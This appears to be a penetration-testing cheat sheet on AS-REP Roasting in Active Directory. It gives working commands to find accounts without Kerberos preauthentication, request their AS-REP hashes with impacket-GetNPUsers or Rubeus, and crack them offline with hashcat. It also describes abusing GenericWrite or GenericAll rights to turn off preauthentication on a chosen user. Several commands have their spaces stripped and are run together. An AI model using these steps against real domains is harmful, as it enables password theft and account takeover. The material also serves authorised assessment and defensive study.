AS-REP Roasting is an attack against a misconfiguration in Kerberos where preauthentication is disabled for a user. Without preauthentication, an attacker can request an AS-REP (Authentication Service Response) from the domain controller for that user. The AS-REP contains data encrypted with the user's password hash, allowing the attacker to perform an offline brute-force attack to crack the hash and potentially obtain the user's password.
This can be done from Kali as well as windows.
Initial Step: Identification
# To identify users with the "Do not require Kerberos preauthentication" option enabled using impacket-GetNPUsers on Kali Linux, impacket-GetNPUsers<domain>/'<username>':'<password>'-dc-ip<domain-controller-ip>
Type 1: Using Kali Linux:
# Fetch the hash and store it.impacket-GetNPUsers-dc-ip$DC_IP-request-outputfilehashes.asreproast<domainName>/<Username>:<password># We can crack using below command.sudohashcat-m18200hashes.asreproast/usr/share/wordlists/rockyou.txt-r/usr/share/hashcat/rules/best64.rule--force
Let's assume that we are conducting an assessment in which we cannot identify any AD users with the account option Do not require Kerberos preauthentication enabled. While enumerating, we notice that we have GenericWrite or GenericAll permissions on another AD user account. Using these permissions, we could reset their passwords, but this would lock out the user from accessing the account. We could also leverage these permissions to modify the User Account Control value of the user to not require Kerberos preauthentication. This attack is known as Targeted AS-REP Roasting. Notably, we should reset the User Account Control value of the user once we've obtained the hash.
# Send Rubeus.exe in victim machine.
locate Rubeus.exe
.\Rubeus.exe asreproast /nowrap /outfile:hashes.asresroast
# save hash into kali linux and crack using hashcat.
sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
